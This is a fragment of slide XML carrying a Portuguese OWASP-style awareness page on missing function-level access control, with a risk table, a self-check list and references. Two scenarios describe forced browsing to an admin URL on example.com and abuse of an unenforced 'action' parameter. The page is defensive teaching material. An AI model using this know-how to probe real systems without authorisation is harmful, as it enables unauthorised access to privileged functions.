                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="599144">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a:p>
                  </a:txBody>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50405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000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicaçã</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" sz="1000" b="1" noProof="0" dirty="0" smtClean="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b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploração</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FÁCIL</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalência</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMUM</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MÉDIO</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pacto</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERADO</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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479783">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Qualquer um com acesso à rede pode enviar uma requisição para a sua aplicação. Usuários anônimos poderiam acessar fun-cionalidades privadas ou usuários normais acessarem uma função privilegiada?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>O atacante, que é um usuário autorizado no sistema, simplesmente muda a URL ou um parâmetro para uma função privilegiada. O acesso é concedido? Usuários anônimos podem acessar funções privadas que não são protegidas.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicações nem sempre protegem adequadamente as função de aplicação. Às vezes, a proteção em nível de função é gerenciada via configuração, e o sistema é mal  configurado. Às vezes, desenvolvedores devem incluir verificações de código adequadas, e eles esquecem. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>A detecção de tais falhas é fácil. A parte mais difícil é identificar em quais páginas (URLs) ou funções existem para atacar.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" baseline="0" dirty="0" smtClean="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a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tais falhas permitem aos atacantes acessarem funcionalidades não autorizadas. Funções administrativas são os principais alvos para esse tipo de ataque.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considere o valor de negócio das funções expostas e os dados que elas processam. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Também considere o impacto para sua reputação se essa vulnerabilidade se tornar pública.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6400800"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemplos de Cenários de Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O atacante simplesmente força a navegação pelas URLs alvo. As seguintes URLs exigem autenticação. Direitos de administrador também são exigidos para acessar a página </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/admin_getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Se um usuário não autenticado pode acessar qualquer página, isso é uma falha. Se um usuário autenticado, não administrador, tem permissão para acessar a página </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, isso também é uma falha, e pode levar o atacante para mais páginas de administração inadequadamente protegidas. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uma página fornece um parâmetro ‘action‘ para especificar a função que está sendo chamada, e diferentes ações exigem papéis diferentes. Se esses papéis não são aplicados, isso é uma falha.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3635896"/>
            <a:ext cx="3383280" cy="2688704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou Vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A melhor maneira para descobrir se uma aplicação falha em restringir adequadamente o acesso em nível de função é verificar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>todas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> as funções da aplicação:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A UI mostra a navegação para as funções não autorizadas?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No lado do servidor falta verificação de autenticação ou autorização?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No lado do servidor as verificações feitas dependem apenas de informações providas pelo atacante?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utilizando um proxy, navegue sua aplicação com um papel privilegiado. Então revisite páginas restritas utilizando um papel menos privilegiado. Se as respostas do servidor são iguais, você provavelmente está vulnerável. Alguns testes de proxies suportam diretamente esse tipo de análise.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Você pode também verificar a implementação do controle de acesso no código. Tente seguir uma única requisição privilegiada através do código e verifique o padrão de autorização. Então pesquise o código base para encontrar onde o padrão não está sendo seguido.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ferramentas automatizadas são improváveis de encontrar esses problemas.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="27432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r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Top 10-2007 on Failure to Restrict URL Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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7"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Path Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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9"/>
              </a:rPr>
              <a:t>OWASP Article on Forced Browsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para requisitos adicionais de acesso de controle, veja o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
